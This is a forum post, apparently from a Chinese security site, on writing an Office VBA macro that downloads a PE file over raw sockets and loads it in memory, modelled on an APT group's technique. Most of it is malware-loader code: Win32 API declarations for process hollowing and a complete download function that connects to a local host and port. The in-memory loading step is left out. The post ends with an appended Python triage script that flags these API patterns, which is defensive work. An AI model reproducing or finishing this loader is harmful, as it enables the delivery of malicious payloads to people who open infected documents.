An Office macro virus that downloads a PE remotely and loads it in memory
2021-5-23 17:45 7242


1. Introduction

    This code was written in early 2019. At the time an APT group named OceanLotus (海莲花) used Office macros to load shellcode, used the shellcode to load malware in memory, and loaded a malicious DLL by DLL side-loading (白加黑). After fully reproducing their attack technique from the analysis report, I wanted to try a bit more. In their code both the shellcode and the PE file were decrypted from local storage; on that basis I added downloading the PE file into memory over the network, loading the PE in memory directly from the Office macro, and made it compatible with both 32-bit and 64-bit systems.
    Since the forum owner said projects of this kind should not have their source code shared directly, this post only covers the function and structure declarations for the download part; interested readers can implement the rest themselves based on this post. The project aims to explore more possibilities of malicious Office macros so that blue teams can defend better; do not use it for illegal purposes.

2. Requirements analysis and preliminary design

  2.1 Network download
  Use the macro to call exported functions of ws2_32.dll
  2.2 In-memory loading
  Use the macro to call exported functions of kernel32.dll
  2.3 32-bit and 64-bit compatibility
  Every function and structure needs two declarations/definitions

3. Partial implementation

    First the required functions must be declared and the structures defined; I spent a long time on this. The declarations of all the functions are as follows, covering both 32-bit and 64-bit:

#If Win64 Then
    Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
    Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongLong, ByVal SOCKADDR As LongLong, ByVal namelen As Long) As Long
    Public Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()
    Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongLong, lpResult As LongLong) As Long
    Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long
    Public Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long
    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
    Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
    Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long
 
    Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
    Private Declare PtrSafe Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare PtrSafe Function GetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
    Private Declare PtrSafe Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
    Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
    Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
    Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal hThread As LongPtr) As Long
    Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
 
    Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As LongPtr, ByVal imageAddress As LongPtr) As Long
    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
    Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
    Public Declare Function connect Lib "ws2_32.dll" (ByVal socket As Long, ByVal SOCKADDR As Long, ByVal namelen As Long) As Long
    Public Declare Sub WSACleanup Lib "ws2_32.dll" ()
    Private Declare Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As Long, lpResult As Long) As Long
    Public Declare Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long
    Public Declare Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long
    Private Declare Function CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) As Long
    Public Declare Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
    Private Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long
    Private Declare Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long
    Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
    Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
    Private Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
    Private Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long
    Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
    Public Declare Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As Long, ByVal imageAddress As Long) As Long
    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If

    With the functions above declared, some structures still need to be defined, including those used for socket communication and those for the PE file format.
Socket communication structures:

#If Win64 Then
    Private Type WSADATA
        wVersion As Integer
        wHighVersion As Integer
        szDescription(0 To WSADESCRIPTION_LEN) As Byte
        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
        iMaxSockets As Integer
        iMaxUdpDg As Integer
        lpVendorInfo As LongLong
    End Type
    Private Type ADDRINFO
        ai_flags As Long
        ai_family As Long
        ai_socktype As Long
        ai_protocol As Long
        ai_addrlen As Long
        ai_canonName As LongLong 'strptr
        ai_addr As LongLong 'p sockaddr
        ai_next As LongLong 'p addrinfo
    End Type
#Else
    Private Type WSADATA
        wVersion As Integer
        wHighVersion As Integer
        szDescription(0 To WSADESCRIPTION_LEN) As Byte
        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
        iMaxSockets As Integer
        iMaxUdpDg As Integer
        lpVendorInfo As Long
    End Type
    Private Type ADDRINFO
        ai_flags As Long
        ai_family As Long
        ai_socktype As Long
        ai_protocol As Long
        ai_addrlen As Long
        ai_canonName As Long 'strptr
        ai_addr As Long 'p sockaddr
        ai_next As Long 'p addrinfo
    End Type
#End If

Some enums that are needed:

Enum AF
    AF_UNSPEC = 0
    AF_INET = 2
    AF_IPX = 6
    AF_APPLETALK = 16
    AF_NETBIOS = 17
    AF_INET6 = 23
    AF_IRDA = 26
    AF_BTH = 32
End Enum
 
Enum sock_type
    SOCK_STREAM = 1
    SOCK_DGRAM = 2
    SOCK_RAW = 3
    SOCK_RDM = 4
    SOCK_SEQPACKET = 5
End Enum

    There are too many PE file structures to write out; just write them in the same format and with the same types as above.


    The download function is as follows:

Function GetCode()
    Dim m_wsaData As WSADATA
    Dim m_RetVal As Integer
    Dim m_Hints As ADDRINFO
    Dim m_ConnSocket As Long: m_ConnSocket = INVALID_SOCKET
    Dim Server As String
    Dim port As String
    #If Win64 Then
        Dim pAddrInfo As LongLong
    #Else
        Dim pAddrInfo As Long
    #End If
    Dim RetVal As Long
    Dim lastError As Long
    RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData)
    If (RetVal <> 0) Then
        LogError "WSAStartup failed with error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If
    m_Hints.ai_family = AF.AF_UNSPEC
    m_Hints.ai_socktype = sock_type.SOCK_STREAM
    Server = "127.0.0.1"
    port = "9593"
    RetVal = GetAddrInfo(Server, port, VarPtr(m_Hints), pAddrInfo)
    If (RetVal <> 0) Then
        LogError "Cannot resolve address " & Server & " and port " & port & ", error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If
    m_Hints.ai_next = pAddrInfo
    Dim connected As Boolean: connected = False
    Do While m_Hints.ai_next > 0
    'Do While 1
        CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints)
        m_ConnSocket = ws_socket(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol)
        If (m_ConnSocket = INVALID_SOCKET) Then
            LogError "Error opening socket, error " & RetVal
        Else
            Dim connectionResult As Long
            connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen)
            If connectionResult <> SOCKET_ERROR Then
                connected = True
                Exit Do
            End If
            LogError "connect() to socket failed"
            closesocket (m_ConnSocket)
        End If
    Loop
    If Not connected Then
        LogError "Fatal error: unable to connect to the server", WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If
    'Dim SendBuf() As Byte
    'SendBuf = StrConv("Message #1", vbNarrow)
    'Send
    Dim dataBuf As Variant
    dataBuf = Array(32, 42, 42, 5, 6)
    Dim dataLen As Integer: dataLen = UBound(dataBuf) - LBound(dataBuf) + 1
    Dim sendBuf() As Byte
    ReDim sendBuf(dataLen - 1)   'dataLen elements, indices 0 .. dataLen-1
    'Print the data being sent
    Dim i As Long
    For i = 0 To dataLen - 1
        sendBuf(i) = dataBuf(i)
        Debug.Print sendBuf(i);
    Next i
    RetVal = Send(m_ConnSocket, sendBuf(0), dataLen, 0)
    If RetVal = SOCKET_ERROR Then
        LogError "send() failed", WSAGetLastError()
        Call WSACleanup
        Exit Function
    Else
        Debug.Print "sent " & RetVal & " bytes"
    End If
    'Receive
    Dim payloadBuf() As Byte
    Dim recvBuf() As Byte
    Dim recvSize As Integer: recvSize = 32
    ReDim recvBuf(recvSize - 1)   'recvSize bytes of scratch space
    Dim recvLen As Integer: recvLen = 0
    Dim index As Long: index = 0
    Do While 1
        recvLen = Recv(m_ConnSocket, recvBuf(0), recvSize, 0)
        'For i = 0 To recvLen - 1
        '   Debug.Print recvBuf(i);
        'Next i
        'Debug.Print
        If recvLen > 0 Then
            'grow the payload to exactly index + recvLen bytes and append this chunk
            ReDim Preserve payloadBuf(index + recvLen - 1)
            Call CopyMemory(ByVal VarPtr(payloadBuf(index)), ByVal VarPtr(recvBuf(0)), recvLen)
            index = index + recvLen
        Else
            Exit Do
        End If
    Loop
    'Print the received data
    Debug.Print "接收到的长度为:";
    Debug.Print UBound(payloadBuf) - LBound(payloadBuf) + 1
    'Debug.Print "接收到的数据为:";
    'For i = 0 To index - 1
    '    Debug.Print payloadBuf(i);  'a trailing ; suppresses the newline
    'Next i
    'Debug.Print
    RetVal = closesocket(m_ConnSocket)
    If RetVal <> 0 Then
        LogError "closesocket() failed", WSAGetLastError()
        Call WSACleanup
    Else
        Debug.Print "closed socket"
    End If
    GetCode = payloadBuf
End Function

    That is the rough idea and code for the download part. Those interested can implement the in-memory loading part themselves; the difficulty lies mainly in defining the structures.

4. Conclusion

    Office macro programming is logically the same as Windows programming; the hard part is defining the structures and declaring the APIs, especially the PE file structures. Following the example above, in-memory loading can be achieved with a bit of time. It is not difficult, just tedious.
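Added here as a defender's example, not code from the original post: a Python triage script that scans a VBA module for the Declare pattern shown above (Winsock client plus VirtualAllocEx/WriteProcessMemory, GetThreadContext/SetThreadContext/ResumeThread and NtUnmapViewOfSection) and returns a verdict. The group names, the regex and SAMPLE_VBA are my own constructions.

```python
"""Static triage of a VBA module for the Declare pattern discussed above.
Added example (not code from the original post): maps each Declare to its
exported name, honouring Alias, and reports which capability groups co-occur."""
import re
from collections import defaultdict
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.IGNORECASE)

GROUPS = {  # exported names, lower-case; a group hits only when complete
    "winsock": {"wsastartup", "socket", "connect", "send", "recv"},
    "remote_write": {"virtualallocex", "writeprocessmemory"},
    "thread_hijack": {"getthreadcontext", "setthreadcontext", "resumethread"},
    "unmap": {"ntunmapviewofsection"},
}

def extract_imports(vba):
    """Return {dll: {exported api}}; the Alias name wins over the VBA name."""
    out = defaultdict(set)
    for name, lib, alias in DECLARE_RE.findall(vba):
        out[lib.lower().removesuffix(".dll")].add((alias or name).lower())
    return dict(out)

def triage(vba):
    """Return (verdict, {group: sorted apis}) for one VBA module."""
    apis = set().union(*extract_imports(vba).values())
    hits = {g: sorted(n) for g, n in GROUPS.items() if n <= apis}
    found = set(hits)
    if {"winsock", "remote_write", "thread_hijack"} <= found:
        verdict = "remote-download + process-hollowing loader"
    elif {"remote_write", "thread_hijack"} <= found:
        verdict = "process-injection capability"
    elif "winsock" in found:
        verdict = "raw network client"
    else:
        verdict = "no injection indicators"
    return verdict, hits

# Constructed sample mimicking the post's 64-bit declarations (bodies shortened).
SAMPLE_VBA = """
Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal v As Integer) As Long
Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" () As Long
Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal s As LongLong) As Long
Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" () As Long
Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" () As Long
Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" () As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" () As Long
Private Declare PtrSafe Function GetThreadContext Lib "kernel32" () As Long
Private Declare PtrSafe Function SetThreadContext Lib "kernel32" () As Long
Private Declare PtrSafe Function ResumeThread Lib "kernel32" () As Long
Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" () As Long
"""
```

Run `triage(SAMPLE_VBA)` to see the verdict; `extract_imports` alone is useful for feeding a YARA or olevba rule with the real export names rather than the renamed VBA wrappers.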



Latest replies (2)
mJqalJqN 2021-5-24 23:56
Where's the sample?
mb_othzuqqm 2021-5-25 13:38
Awesome, 666, you beauty